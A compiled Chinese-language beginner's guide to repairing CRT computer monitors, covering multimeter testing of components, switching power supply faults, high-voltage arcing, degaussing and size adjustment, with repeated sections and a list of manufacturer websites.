    开机检查，发现机内很干净，高压帽附近无积灰，绝缘良好。观察线路板发现，行偏转线圈与行管集电极间的一个电感线圈一端松动，有打火氧化的痕迹，补焊后开机，问题解决。原来是行谐回路虚焊造成打火，继而断路，引起行扫描弱振，失去高压，同时由于氧化点时接时断，就造成机内出现不稳定的交流声（由行推动变压器和行输出变压器发出）。
    实例二
    一台DELL 14英寸彩显，屏幕出现明显偏色，呈蓝色刺眼光栅，伴有回扫线，字符隐约可见，调整亮度电位器、对比度电位器变化不大。但用手拍击显示器时会出现瞬时正常，但不能保持，看起来又是一个接触不良的典型表现。
    然而检查所有的插接件均无生锈、松动现象，检查信号电缆正常，线路板焊点无一松动、开裂。
    为什么没有接触不良的地方却会表现出接触不良的典型症状呢？要揭示整个问题必须找到故障点。
    从理论上可知，显示器偏色，问题一定出现在视放电路或显像管附属电路。观察到屏幕呈现亮蓝光栅，应该是蓝枪阴极电位过低，致使电子束流增大，使屏幕被蓝色遮盖，同时出现回扫线。
    开机带电测量，发现蓝色通道末级视放管集电极电位明显比其它两个通道低，正常应该为90V～110V左右，实测为10V左右，问题就出在这里。由于三个通道的视放管电源均来自同一组电源，出现不同是不正常的，所以从此处开始往前（朝电源方向）查找，发现往前到电源这一段电路只有水泥电阻，电阻前的电压正常（90V左右），它以后的电压就明显跌落（10V左右），看来这只水泥电阻就是罪魁祸首，拆下电阻测量，发现其阻值很大，几乎处于断路（实际应该为10欧姆左右），用手敲击，阻值会忽大忽小，原来是其内部电阻丝烧断，但熔化物似连非连，造成接触不良。更换电阻，故障排除。
    以上两例，症状均和接触不良类似，有的现象的确属于接触不良，如插接件不良、焊点虚焊、焊盘松动等，但也有的是元件故障引起的，这类问题往往会把人引向歧途，以为是简单的接触不良。只有认真地进行分析和检查，必要时必须通过仪表测量，才能找到症结所在。


显示器维修入门全攻略（二）

《一键清理系统垃圾》

显示器维修入门全攻略（二）

维修入门篇

一.检修显示器的常见方法：

    检修显示器故障的常用方法很多，熟练的掌握和应用其常见的检查，测试，维修方法是显示器维修能很快提高的重要方式。也是能快速查出故障元器件的重要手段！下面就具体介绍一些维修中常见的检修方法。

1.测电流法：

    测量电流是显示器维修的基础方法之一。它主要用于测量晶体管，集成电路块的电源的负载电流和工作电流，以此来检测集成电路，晶体管等元器件的工作状态是否正常，其电源负载是否正常等等。只要所测得的晶体管或集成电路的负载电流正常，就可断定该电路的工作状态就基本正常。反之，如果其电流和正常值相比变化很大，那就说明该电路有问题，就可对症下药，对其重点检查。

2.测电压法：

    测量电压也是维修显示器的基础方法之一。在实践中经常用到，它主要是测量电路和其元器件的工作电压，以此来对故障部位和元器件进行判定。测电压又可分为测交流电压和测直流电压两种类别。测交流电压就是用万用表的交流电压挡，来测量显示器电源的交流电压值。当然也可在万用表上串连上一个0.1uF左右的耐压足够大的电容来测量场扫描输出电路，行扫描输出电路，视屏放大电路等部位的交流部分。用万用表检查其交流电压是否有无或大小，然后再于正常状态下所测数值来进行比较，以此来判断该电路的工作是否正常。

3.测电阻法：

    测量电阻也是维修显示器的基础方法之一。它主要分为两种测量，一是测量显示器电路和元器件的对地电阻值；一是测量元器件的本身的电阻值。测量电路输出端的对地电阻值，可以判别电路的负载是否正常，如当测量稳压电源输出端的对地电阻值时，如果其负载电阻发生较大的变化，那么稳压电源输出端的对地电阻必然会有较大的变化，这就可很容易的判定故障的所在。当测量晶体管或集成电路块的各个脚的对地电阻值时，需要测量其正反向电阻，通常情况下以负表笔接地时测得的阻值为正向电阻，而以正表笔接地时所测得的电阻值当然就为反向电阻了。这就可根据所测电阻值的变化，来和正常情况下的电阻值进行比较，就可判断出故障所在。其次，当无法清楚的判定故障的具体部位时，可取下晶体管或集成电路块，来测量晶体管各脚之间的正反向电阻值和集成电路块各脚与其接地脚之间的正反向电阻值，也可大概判断出晶体管或集成电路块的好坏！

4.观察法：

    顾名思义，就是用眼睛直接观察元器件是否烧毁，损坏，变型，变色，破裂等等，已及如接通电流后显管灯丝亮不亮等，这些问题往往就是故障所在或故障相关，找到这些问题，往往就能很快的判断出问题修复显示器。

5.敲击法：

    这也是检修显示器很有效的方法之一，特别是对于虚焊和接触不良等引起的故障。其方法是，用绝缘体，如木棍，在加电或不加电的情况下，对有可能出问题的部位，进行敲打和按压，就可较容易的发现虚焊和接触不良等故障。

6.摸温法：

    就是直接用手去摸被怀疑的元器件的温度，就可很快的判断出问题所在。这种方法主要用于检查电解电容，变压器，晶体管等部件出问题时可用，根据其温度的异常变化升高等现象来发现问题。但此方法一定要在断电的情况下进行哈，还要千万注意不要烫着手。

7.冷热法：
    这是一个很有效的方法，特别是对于一些热稳定性差和一些发热较严重的元器件用此法还比较有效。其方法是当发现哪个元器件温升异常时，可用纯酒精蘸在棉花球上敷于该元器件的表面让其迅速冷却。其原理和硬件超频中的水冷降温法相同哈。待冷却后再开机，如发现刚才的故障明显减轻或消失，则可初步判断该元器件已热失效或已有问题，可将其更换之。而加温法呢他是和冷却法相辅相成的哈，当发现元器件热稳定性差时，用冷却法无效的情况下，我们就可用烙铁或电吹风等对被怀疑的元器件进行适当的加热处理，然后在开机观察如发现刚才不明显的故障加重了，那我们就可对该元器件进行重点检查，直至将其更换之。

8.干扰法：

    在业余条件下，用干扰法进行检修也是一种较常见的方法。其方法是，用解刀等物去接触该电路的输入端，注入人体感应信号或碰撞时产生的物理性杂波。用来检查视频，中频等电路，然后可根据显示屏上的杂波反应，就可一基本断定电路工作是否正常。其检查顺序应从后级向前级，检查到哪级无杂波反应哪级就有问题，就可对其进行重点检测。

9.换件法：

    换件法是很实用和很快捷的检修方法。当你对哪个元器件拿不准时，就可先将其更换掉，换上好的元器件，如果故障消除，就证明原来的元器件有问题。特别是对于一些不便测量的元器件的故障更应如此。如高压包[内部绕组短路]，高压硅堆[其内部绝缘不好，整流特性差等]，以及一些电容电阻等。

二.常见显示器故障的维修：

    下面就具体介绍一下显示器的一些常见故障的调试，检修方法：

1.如何维修显示器的开关电源。

    如今的电脑显示器中的电源绝大部分都采用的是开关型稳压电源[开关电源]。所谓开关电源，是指开关电源中的调整管工作在截止区和饱和区。它截止时，相当机械开关的断开，饱和时，相当于机械开关的闭合。这种起开关作用的三极管，就叫开关管[开关调整管，三极管的一种]，用开关管来稳定电压的电源，我们就把它称作开关稳压电源。显示器中所出的很大一部分故障都是开关电源的故障，有人戏说，只要掌握了开关电源的维修方法，就可出师修显示器了。

    开关型稳压电源同老式的线性串联型稳压电源相比，其具有功耗小效率高，稳压范围宽，可靠安全，不用庞大的电源变压器，滤波电容容量小，机内温升低等优点。按开关电源和负载的联接方式划分，开关电源又可分为串联型和并联型两类。串联型开关电源的输出端通过开关调整管及整流二级管与电网直接相联，故其整机底板都带电，俗称'热底板'，给维修带来很大的安全问题，大家在拆机的时侯要注意。串联型开关电源的优处就是对电路要求简单，对开关调整管要求较低。而并联型开关电源，其输出端与交流220V电网间由开关变压器一次侧，二次侧进行隔离，因此整机电路板上除了于开关变压器一次侧相连的部位外，其余地方均不带电，故称其为'冷底板'。并联型开关电源安全性好，可是其电路相对复杂，对开关管的要求较高，如其保护电路工作壮态不良，那其产生的故障也较多较为严重。如果按不同的激励方式来划分，又分为他激式和自激式两类。

    以上我们对显示器的开关电源有了一些了解，由于维修开关电源是显示器维修中的最重点[在日常维修中要占显示器维修量的70%左右]和难点。


显示器维修入门全攻略（三）

《一键清理系统垃圾》

显示器维修入门全攻略（三）

    下面我们就对开关电源的维修常识做一较系统的阐述。

    在维修开关电源的时侯最好要加入一个隔离变压器。啥叫隔离变压器呢？就是指在开关电源的一次侧和二次侧变压比为1：1的电源变压器，它可避免由于公共地带电造成人员触电。对于14寸到17寸的显示器用70W-100W的隔离变压器就够了。隔离变压器可购买也可自制。自制隔离变压器，一般要求其功率大于所修机器的20%-40%既可。对于100W的隔离变压器自制可用旧电源变压器将其二次侧拆出，然后重绕隔离层[要保证隔离良好]，然后再用1mm的漆包线按原箍数重新绕制即可。

    在维修开关电源的时侯亦可以采用降压检修法。其方法是，将显示器的电源插头，接在一个交流变压器上，再把交流调压器的输出电压调到100V左右，然后在通电检修，并逐次提高电源电压来检修。

    a.故障一，开机既烧保险，输出电压为零。这一般是由开关管被击穿，C，E极短路所造成的。此时可先将开关管拆下测其C，E结电阻，如为零或很小，则换掉既可。但也要检查下其它元器件有无问题后方才开机。

    b.故障二，光栅出现'S'形的扭曲。这问题应重点检查滤波电路和稳压电路，一般是二极管有一只断路，由全波整流变成半波整流，或其滤波电容容量减少所致。

    c.故障三，交流220V整流滤波电路出现短路性故障，且开机烧保险。应检查一下整流二极管有无短路，滤波电容是否严重漏电。还可拔去消磁线圈插头，检查下消磁热敏电阻有无短路性故障，如有应换新。

    d.故障四，开机无光栅，无显示，电源指示灯也不亮，但不烧保险。这个问题应检查交流互感变压器有无开路，整流电路的限流电阻[一般为15-25W，5-40欧的水泥电阻]有无开路[烧断]失效，或整流二极管是否断路。

    e.故障五，无光栅、无显示，且机内发出异常声响。如发出"吱吱"声，说明振荡频率低，应检查与振荡有关的元件，如发出"嗒嗒"声，说明电源过流保护，应检查过流保护电路。

    f.故障六，输出电压高于或低于正常值。输出电压高出或低出正常值十几伏到几十伏，但又不为零，保护电路也未动作[烧毁]。这时的故障现象将随电压变化而情况各异。这时可调整稳压调整电位器，如输出不变或变化很小，就说明取样误差放大电路有故障，其中提供基准的稳压二极管被击穿或短路的可能性很大。其次，取样放大晶体管损坏，都可造成输出电压变大或变小。

    2.显管高压打火的维修。

    显管高压打火故障也是显示器维修中最常见的问题之一。其主要表现为荧光屏光栅出现许多无规律的亮点，严重时成点状的线，有时还可听见机内“吱吱”作响，如果打火严重，将造成显示图像模糊，并可能将产生数秒或数分钟后光栅消失的故障现象。而显管高压打火产生的原因和部位较多，主要有：显象管座内高压打火；显象管高压嘴或高压帽打火；高压包高压引线端打火；聚焦电位器内部接触不良打火等等。下面我们就分别的说一下其维修的方法。

    a.显象管座打火的维修。

    显象管座的打火一般在聚焦级。产生显象管座内部打火的原因主要是显示器使用的环境过于潮湿或长期不用造成的。由于聚焦级的电压很高在4-9KV之间，修理方法是，关掉电源，将管座从尾板上拆下，用小刀或细砂纸将管脚的锈迹刮去，再用纯酒精清洗干净。并把管座塑料内壁的锈迹用酒精清洗干净，然后用吹风吹干，重新装好即可。

    b.显象管高压嘴或高压帽周围打火。

    显象管高压嘴周围打火，除环境潮湿外，还有显管的高压嘴和锥体玻璃之间接触不紧密或有杂质也有关。要修高压嘴打火，先得对其放电，方法是将一大号木柄平口解刀，插入高压嘴中多次碰触既可，有时还可听见'啪'的放电声。然后取下高压帽，检查高压嘴及高压卡簧有无锈迹其周围有无打火迹象和积灰。如有，可照前法将其清除干净，然后用吹风将其吹干，要注意温度和时间，以免显管局部过热而炸裂。然后在高压嘴周围均匀的涂上一些黄油，再扣好高压帽即可。

    c.高压包及聚焦电位器打火。

    高压包打火可造成光栅模糊或无光栅。如果是高压包本身打火，那就只有换新的。如果是高压包的引线端打火，可用纯酒精将其搽干净即可。

    如果是高压包上的聚焦电位器打火，可关机后调整聚焦电位器多次，看是否能使其内部触点接触变好。如不行，最好还是将其更换掉。

    3.如何对显示器进行消磁。

    显示屏被磁化出现色斑也是常遇到的问题。其产生的原因主要有，显示器靠近磁性物品被磁化；搬动显示器后，使机内偏转线圈发生移位，产生色纯不良；消磁电路损坏。虽然一些显示器自身带有一定的消磁功能，但对于较严重的磁化就有些无能为力了。

    对于因受外磁场干扰而造成的色纯不良，可用外消磁器进行消磁。消磁器可购买，也可自制。自制消磁器可用工业用交流接触器拆去一边后接上电源线及开关放入塑料长筒内或绕上一层电胶布即可。在应急的情况下，可找一只废旧电度表[1-5A都可]，取下电压线圈，将其'门'形线芯取掉，只剩穿入线圈的T型铁芯和线圈，然后在线圈的两接线柱上接上电源线及开关插头，再用塑料布将其缠牢即可。但无论哪种消磁法，都要注意安全。通电后手握消磁器不断晃动，逐渐靠近荧光屏，对带磁部位可反复进行，然后一边晃动消磁器一边后退到离荧光屏2米左右再关掉电源。每次通电时间不宜过长，如果一次消磁效果不好可反复进行几次。

    对于由于搬动显示器后造成的色纯不良，可打开显现器后盖将偏转线圈恢复原来的位置并将偏转线圈螺钉拧紧既可。对于因机内消磁电路损坏引起的色纯不良，可先检查一下热敏[消磁]电阻是否损坏，将其取下，用手摇如发出'哗哗'的声音则为热敏电阻已淬。用万用表查其引脚电阻值，如阻值小于8欧或大于50欧则说明消磁电阻内RTC元件已坏，应换新。如消磁电阻阻值正常，则应重点检查消磁线圈的引线，插头，插座之间有无松动和接触不良。另外如消磁电阻短路或漏电还将造成开机烧保险的故障，大家要注意。

    4.显示屏宽屏小屏故障的维修。

    显示器使用日久后，就可能出现显示屏显示面积变大或变小的故障。这时调整其水平和垂直宽度电位器调尽了也没效果了，就需打开后盖进行调整。例如一台湾产14寸显示器，使用三年后出现，在640X480显示模式下屏幕基本正常可调，而在800X600显示模式下严重小屏，画面两边各有两厘米左右的黑边，且调尽机外旋钮也是如此；更可气的是在640X400的DOS模式下又严重大屏，以至于在启动时连启动画面也只能看到2/3，调整外旋钮同样不起作用。拆下显示器后盖，见其主电路板上共有四组微调电位器旋纽[分别是H.WIDTH；PIN；V.HEIGHT；H.PHASE]，另外还有31KHz，35KHz，38KHz三个同步电位器旋纽，它们分别负责640X400，640X480，800X600三种显示模式。连接好显示器，打开电源，分别在WINDOWS和DOS[640X400]三种分辨率模式下，用小号解刀，分别调节电位器旋钮至三种分辨率都满意为止。因为各个显示器这几个旋钮大同小异，大家可反复多试几次既可。调整完毕后，再进入相应的分辨率模式下，根据需要再调节下聚焦和亮度至自己满意，这两个旋钮一般在高压包上，大家在调整的时侯注意安全就行了，因为高压包上电压很高。对这几样的调整的关键就是要胆大心细。这种调整方法也可对一些新购的手调显示器，在分辩率切换时要重偏屏情况的处理。

    至此，本文就告一段落。你如果能掌握以上的维修方法，那么应付日常常见的显示器维修也没多大问题了。希望大家在看了本文之后能对大家的维修知识的提高起到一些帮助作用。最后祝大家都能成为一个较全面的DIY。


显示器维修入门全攻略(一）

《一键清理系统垃圾》

显示器维修入门全攻略(一）

    显示器维修是众多电脑DIY的弱项。平时，如果是系统崩溃了，或者说到超频等等，许多DIY都能口若悬河的说出许多道道来。但一遇到显示器出问题了，大家就会觉得束手无策了。再加上许多的电脑报刊上，谈电脑软硬件，谈各种主机外设维护的多，而介绍显示器维修的少之又少，而且既使有介绍也是较专业的维修内容了，其内容常常令许多初涉此项的DIY看得如云里雾里，不得而终。久而久之，在众多DIY的心目就行成了显示器是专业人士才涉猎的邻域。笔者认为有必要纠正这一'欺软怕硬'的错误倾向，让大家都做一个较全面的DIY高手。本文仅从业余条件下如何对显示器常见的毛病进行维修，做一个较系统的阐述，使大家在业余的条件下能对显示器进行日常的维护和常见问题的维修起到一些帮助作用。如果能将许多初涉此项的DIY领进门来，那将是本文的最终目的了。

维修基础篇

一.如何判断常见元器件的好坏。

    在业余条件下我们应尽量学会使用万用表来判定一些常见元器件的好坏及元器件的正负极等特性。[当然这些基础知识不光可用在显示器的维修上，举一反三用于电脑的其它部件的维修上也很有用。

1.电容：

    如何认电容？电容常见的标记方式采用的是直接标记，其常用的单位有pF，uF两种，如电解电容470uF，另如瓷片电容2200pF等等，很容易的就能认出。但一些小容量的电容，却采用的是数字标示法。其一般有三位数，，第一，二位数为有效的数字，第三位数为倍数，既表示后面要跟多少个0。例如343表示34X1000pF，另外，如果第三位数为9，表示10X-1，而不是10的9次方，例如479表达为就是4.7pF。

    在电容更换时主要应注意电容的耐压要求一般不低于原电容的耐压要求。其电容量在要求较严格的电路中，一般不超个原电容容量的正负20%即可。在要求不太严格的电路中，如旁路电路中，一般要求不小于原电容的1/2，一般不大于原电容的2-6倍即可。

2.电阻：

    如何认电阻？电阻主要有碳质电阻，碳膜电阻，金属膜电阻三类，应用最广的为碳膜电阻，最高档的为金属膜电阻。要想使用电阻，首先要弄清电阻的阻值。电阻的阻值除了直接标注之外，常以色环来标示，其中最常见的为4色环标示和5色环标示。如采用4色环标题，其第一色环是十位数，第二色环为个位数，第三色环为应乘位数，第四色环为误差率。例如4色环的电阻的颜色排列为红蓝棕金。则这只电阻的电阻值为260欧误差率为5%。如采用5色环表示，则其第一色环为百位数，第二色环是十位数，第三色环是个位数，第四色环是应乘位数，第五色环为误差率。例如，5色环的电阻的颜色排列为黄红黑黑棕，则其阻值为420X1=420欧，误差为1%。5色环的电阻通常是误差为1%的金属膜电阻。其关系可见附表。

颜色　对应数值　应乘位数　　　　误差率　温度系数
黑　　　0　　　 X1　　　　　　　　　　　200ppm
棕　　　1　　　 X10　　　　　　　1%　　 100ppm
红　　　2　　　 X100　　　　　　 2%　　 50ppm
橙　　　3　　　 X1000　　　　　　　　　 15ppm
黄　　　4　　　 X10000　　　　　　　　　25ppm
绿　　　5　　　 X100000　　　　0．5%　　20ppm
蓝　　　6　　　 X1000000　　　0．25%　　10ppm
紫　　　7　　　 X10000000　　　0．1%　　5ppm
灰　　　8　　　 X100000000　　　　　　　1ppm
白　　　9　　　 X1000000000
黑　　　0
金　　　　　　　X0．1　　　　　　5%
银　　　　　　　X0．01　　　　　10%
本色　　　　　　　　　　　　　　 20%

    用万用表测电阻的阻值，如果其阻值偏大或为无穷大，可能是其内部已断极或接触不良；如果测得其阻值太小或为零，则可能是其内部被击穿或短路。

3.晶体管：

    彩显中使用的晶体管主要有晶体二极管，晶体三极管，可控硅和场效应管等等，其中最常用的是三极管和二极管，如何正确的判断二，三极管的好坏等是学维修显示器的关键之一。

a.晶体二极管：

    要判断二计管的好坏，首先我们有必要知道该二极管是硅管还是锗管的，众所周知，锗管的正向压降一般为0.1-0.3伏之间，而硅管一般为0.6-0.7伏之间。其测量方法为，用两只万用表，当一只万用表测量其正向电阻的时候同时用另外一个万用表测量它的管压降。最后可根据其管压降的数值来判断是锗管还是硅管。那又如何来判断二极管的好坏和正负极呢？硅管可用万用表的RX1K档来测量，锗管可用RX100档来测。一般来说，分别所测的二极管的正反向电阻两者相差越悬殊越好。一般其正向电阻为几百欧到几千欧，其反向电阻为几十千欧以上，就可初步断定这个二极管是好的。同时可判定二极管的正负极。当测得的阻值为几百欧或几千欧时，为二极管的正向电阻，这时正表笔所接的为负极，正表笔所接的为正极。

    另外，如果其正反向电阻为无穷大，表示其内部断线：正反向电阻一样大，这样的二极管也有问题；正反向电阻都为零表示其已短路。

b.晶体三极管：

    晶体三极管是彩显中最常见的元器件之一，如何判断三极管的好坏是彩显维修的关键。要判断晶体三极管的好坏，首先要判别晶体三极管的三极。可用两个万用表同时测量，其方法是用万用表的RXIK档或RX100档，对于NPN型管，当将两个负表笔接基极，正表笔分别接集电极和发射极时，测出的两个PN结的正向电阻应为几百欧或几千欧，然后应把表笔对调再测两个PN结的反向电阻，一般应为几十千欧或几百千欧以上。然后再用万用表测发射极和集电极之间的电阻，测完后再对调表笔再测一次，两次的阻值都应在几十千欧以上，这样的三极管可以基本上断定是好的。
晶体三极管主要起放大作用，那么如何来判测三极管的放大能力呢？其方法是，将万用表调到RX100或RXIK档，当测NPN型管时，正表笔接发射集，负表笔接集电极，测出的阻值一般应为几千欧以上；然后在基级和集电级之间串接一个100K欧的电阻，这时用万用表所测的阻值应明显的减少，变化越大，说明该三极管的放大能力越大，正常。如果变化很小或根本没有变化，那就说明该三极管没有放大能力或放大量很小。

    如果三极管损坏，最好是用同型号的进行更换，无法找到同型号的三极管时，必须根据反向耐压BVceo[这项值最为重要，在更换时一定要选用与其相同或大于该耐压值的晶体管进行代换]、工作频率ft、穿透电流Iceo、功耗Pcm等技术指标来合理选用代换三极管。

4.集成电路块：

    判断集成电路块的好坏，可用万用表测量集成块各脚对地的工作电压，对地电阻值，工作电流是否正常。还可将集成块取下，测量集成块各脚与接地脚之间的阻值是否正常，同时在取下集成块的时侯可测量其外接电路各脚的对地电阻值是否正常。需要特别说的是，在更换集成电路块时，一定要注意焊接质量和焊接时间。有的集成电路块引脚较多，如焊接不当容易产生新的故障。焊接时间太长，很容易损坏集成块的内部电路，甚至使其印刷电路的铜箔和基板脱离而增加不必要的工作量，在焊接时最好使用专用的烙铁头，以加快焊接时间，并要注意散热。如引脚太多一次焊不好，可等下再焊亦可。或者先购回一个相同引脚的集成电路插座，先将插座焊接好后，再将集成电路块插入即可，能这样做是最好的。在更换集成电路块时一般要求用同型号、同规格的集成电路来进行替换。实在找不到原型号、原规格的集成电路时，可考虑用相近功能的集成电路块来代替，但需要注意的是，代替时要弄清供电电压、阻抗匹配、引脚位置以及外围控制电路等问题。

5.行输出变压器[俗称'高压包']：

    高压包是显示器中较常出问题的大件之一。如今的显示器中的高压包多为一体化的[当然也有分体式的]，型号和规格较多，但最常见的为三洋。使得维修的难度加大。其容易出的主要毛病为内部短路。这时可用万用表检查其电源电压来判定其是否正常。若行输出变压器绝缘性能下降或有匝间局部短路现象时，将使行扫描电流激增，开关电源输出电压下降。因此，可通过测量电源电压来判断行输出变压器是否短路。如电源电压降至正常值的1/2左右时，关机后断开行负载，用300Ω/50W的灯泡作假负载，再开机测量主电源电压是否恢复正常。如能恢复正常，而行负载经检查没有短路或变值现象，则基本上可以断定是行输出变压器短路。当高压包损坏时，只能将其更换掉了，有于其种类较多，较难找到同样的来更换，这时只要是同型号的一般都能直接代换。但如代用的行输出变压器内部绕组相同或相近，但引脚排列不符时，这时原来的线路板肯定是无法安装了，可将行输出变压器另外安装固定在机内某部位，再用软铜线将引脚对应接在电路板相应的焊点上即可。

二.新手维修入门应知

    1.首先要数立信心，要坚信通过自己不断的学习和努力一定能将出现的问题修好。在实际维修中，所遇到的问题也多为较简单的问题，真正大的问题也很难遇上。在维修中要做到胆大心细，但是一定要注意安全。

    2.其次要准备好烙铁，万用表，十字和平口的解刀，焊锡丝等常用工具。烙铁选个20-25W的普通优质烙铁即可;万用表初学者就选个量程较大的数字万用表吧;焊锡丝买个两三米就是，但一定要选那种内带松香的优质焊锡丝哟，不过几元钱而已，但焊接质量却要好得多;解刀等拆卸工具大大小小备几把就行。如果你连这些也没有那就赶快去买回来，它们加起来也不过最多百元钱而已，否则你只好用手用眼去维修了

    3.维修前应了解问题发生时的情况，比如电压是否稳定，有无碰撞，受潮受湿，雷电，有无异味异响，有无图象不稳定等等，好做到心中基本有数。在准备折机前，可先检查下彩显的外用电源是否正常，电压是否稳定。接着可检查下彩显的开关和各旋钮是否正常，有无明显的迟钝无力现象。最后应看清彩显的牌号，新旧，灰尘等外表情况。

    4.可按下开关，实际加电观察下显屏的情况。如屏幕上有无光栅图象，图象是否稳定是否有失真，亮度对比度是否可调等等。另外可注意下显示器内是否有异味或打火等现象。

    5.可打开显示器的后盖，仔细检查下显示器内部元器件有无损伤，击穿，烧焦，变色等明显的故障。其次可重点检查下元器件有无脱离，虚焊。机内连线是否有松动，是否插紧。

6.在没有了解清楚故障部位的情况下，不要对机内的一些可调元器件进行盲目的调整，以免人为的将故障复杂化。遇到机内保险丝或限流电阻等保护电路元器件被击穿或烧断时，要先认真检查下其周围电路是否有问题，在确认没问题后，然后再将其更换恢复供电。

    7.在更换元器件时一定要注意焊接质量，注意不要造成虚焊。另外焊接时间也不宜过长，以免损坏元器件，造成不必要的经济损失，虽然有的元器件值不了几分钱。但焊接多次后容易造成铜箔从线路板上脱落，大家须注意。

    8.维修时应本着先检修电源部分，再检修光栅部分，最后才检修图象及图象稳定部分的原则来进行检修。为什么？众所周知，电源是显示器各部分能正常的能量之源，而光栅又是能正常显示图象的基础。

    9.最后要注意的是烙铁，螺丝，元器件等要妥善放置，维修后机内的异物要及时清理干净，连线和插件要重新安装插接到位。以免又造成另外的人为故障。

三.显示器的基本构造和生产厂家网址：

      一般来说，显示器主要由显像管[阴极管]，行，场扫描电路，视频处理电路，多频同步控制电路，显管供电电路，开关电源电路等几部分组成。如今的大部分显示器在出厂时都没有随机附带电路图，这给日常维修增加了很大难度。如你需要可向显示器生产厂家索要电路图和取得其它服务和帮助。下面就列出主要显示器生产厂家的网址，或许对你有帮助。

MAG美格:http://www.maginnovision.com
Viewsonic优派：http://www.Viewsonic.com.tw
飞利浦：http://monitors.be.philips.com
samsung三星：http://samsungelectronics..com/monitor
Hitachi:http://www.nsa-hitachi.com
Sceptre赛普特：http://www.sceptre.com
ADI:http://www.adi.com.tw
现代:http://www.hei.co.kr/eng/product/multi/monitor/
SONY：http://www.ita.sel.sony.com/
Acer:http://www.acer.com
GVC致福:http://www.gvc.com.tw
Plextor:http://www.plextor.com
DTK:http://www.dtk.com.tw
Taxan:http://www.taxan.com.hk/
AOC:http://www.aocltd.com
爱国者:http://www.huaqi.com
HP惠普：http://www.hp.com
IBM:http://www.ibm.com.cn
COMPAQ康柏：http://www.compaq.com
DELL:http://www.dell.com
NEC:http://www.nec-computers.com
Apple苹果：http://www.apple.com
东芝：http://www.toshiba.co.jp/toshiba
华胜：http://www.huasun.com
联想：http://www.lcs.legend.com.cn
虹志AST：http://www.ast.com
NEC：http://www.nec-computers.com
华硕：http://www.asus.com


显示器维修之维修入门篇

《一键清理系统垃圾》

显示器维修之维修入门篇

    一、新手维修入门须知
    1.首先要树立信心，坚信通过自己不断的学习和努力一定能解决出现的问题。在实际维修中，所遇到的问题多为较简单的问题，真正大的问题很难遇上。在维修中要做到胆大心细，并且一定要注意安全。
    2.准备烙铁、万用表、十字和平口的螺丝刀、焊锡丝等常用工具。烙铁选择20W～25W的普通优质烙铁即可；对于万用表，初学者就选个量程较大的数字万用表吧；焊锡丝买两三米就行，但一定要内带松香的优质焊锡丝，其焊接质量要好得多；螺丝刀等拆卸工具大大小小准备几把就行了。
    3.维修前应了解问题发生时的情况，比如电压是否稳定、有无碰撞、是否受潮受湿、有无异味异响、图像是否稳定等等情况，做到心中有数。在准备拆机前，可先检查一下彩显的外用电源是否正常、电压是否稳定。接着可检查一下彩显的开关和各旋钮是否正常、有无明显的迟钝无力现象。最后应看清彩显的牌号、新旧、灰尘等外表情况。
    4.按下开关，观察一下显示屏的情况，如屏幕上有无光栅图像、图像是否稳定、是否有失真、亮度对比度是否可调等等，另外注意一下显示器内是否有异味或打火等现象。
    5.打开显示器的后盖，仔细检查一下显示器内部元器件有无损伤、击穿、烧焦、变色等明显的故障。其次可重点检查一下元器件有无脱离、虚焊、机内连线是否松动。
    6.在没有了解清楚故障部位的情况下，不要对显示器内的一些可调元器件进行盲目的调整，以免人为地将故障复杂化。遇到机内保险丝或限流电阻等保护电路元器件被击穿或烧毁时，要先认真检查一下其周围电路是否有问题，在确认没问题后，再将其更换恢复供电。
    7.在更换元器件时一定要注意焊接质量，不要造成虚焊。另外焊接时间也不宜过长，以免损坏元器件，造成不必要的经济损失。多次焊接元件后容易造成铜箔从线路板上脱落，大家须注意。
    8.维修时应按照先检修电源部分、再检修光栅部分、最后检修图像及图像稳定部分的顺序。因为电源是显示器各部分能正常工作的能量之源，而光栅又是能正常显示图像的基础。
    9.最后要注意的是，烙铁、螺丝刀、元器件等要妥善放置，维修后显示器内的异物要及时清理干净，连线和插件要重新安装到位，以免造成另外的人为故障。
    二、检修显示器的常见方法
    检修显示器故障的常用方法很多，下面就具体介绍一些维修中常见的检修方法。
    1.测电流法
    测量电流是维修显示器的基础方法之一。它主要用于测量晶体管和集成电路块的负载电流和工作电流，以此来检测集成电路、晶体管及其电源负载是否正常等等。只要所测得的晶体管或集成电路的负载电流正常，就可断定该电路的工作状态基本正常。反之，如果其电流与正常值相比变化很大，那就说明该电路有问题，可以对症下药，进行重点检查。
    2.测电压法
    测量电压也是维修显示器的基础方法之一，在实践中经常用到。它主要是测量电路和元器件的工作电压，以此来对故障部位和元器件进行判定。测电压又可分为测交流电压和测直流电压两种类别。测交流电压就是用万用表的交流电压挡，来测量显示器电源的交流电压值。当然也可在万用表上串联上一个0.1μF左右的耐压足够大的电容来测量场扫描输出电路、行扫描输出电路、视频放大电路等部位的交流部分。用万用表检查其交流电压，然后再与正常状态下所测数值进行比较，以此来判断该电路工作是否正常。
    3.测电阻法
    测量电阻也是维修显示器的基础方法之一。它主要分为两种测量：一种是测量显示器电路和元器件的对地电阻值，另外一种是测量元器件本身的电阻值。测量电路输出端的对地电阻值，可以判别电路的负载是否正常。例如当测量稳压电源输出端的对地电阻值时，如果负载电阻发生较大的变化，那么稳压电源输出端的对地电阻必然会有较大的变化，这就可很容易地判定故障的所在。当测量晶体管或集成电路块各个脚的对地电阻值时，需要测量其正反向电阻，通常情况下以负表笔接地时测得的阻值为正向电阻，而以正表笔接地时所测得的电阻值当然就为反向电阻了。这就可根据所测电阻值的变化，来和正常情况下的电阻值进行比较，就可判断出故障所在。
    当无法清楚地判断故障的具体部位时，可取下晶体管或集成电路块，测量晶体管各脚之间的正反向电阻值和集成电路块各脚与接地脚之间的正反向电阻值，也可大概判断出晶体管或集成电路块的好坏。
    4.观察法
    顾名思义，就是用眼睛直接观察元器件是否烧毁、损坏、变形、变色、破裂以及接通电流后显像管灯丝亮不亮等，这些问题往往就是故障所在或与故障密切相关，找到这些问题，就能很快地判断出问题，从而修复显示器。
    5.敲击法
    这也是检修显示器很有效的方法之一，特别是对于虚焊和接触不良等引起的故障。其方法是：用绝缘体，如木棍，在加电或不加电的情况下，对有可能出问题的部位，进行轻轻敲打和按压，就可以较容易地发现虚焊和接触不良等故障。
    6.摸温法
    就是直接用手去摸被怀疑的元器件的温度，可很快地判断出问题所在。这种方法主要用于检查电解电容、变压器、晶体管等部件出问题时可用，根据其温度的异常变化、温升高等现象来发现问题。切记此方法一定要在断电的情况下进行，千万注意不要烫着自己。
    7.冷热法
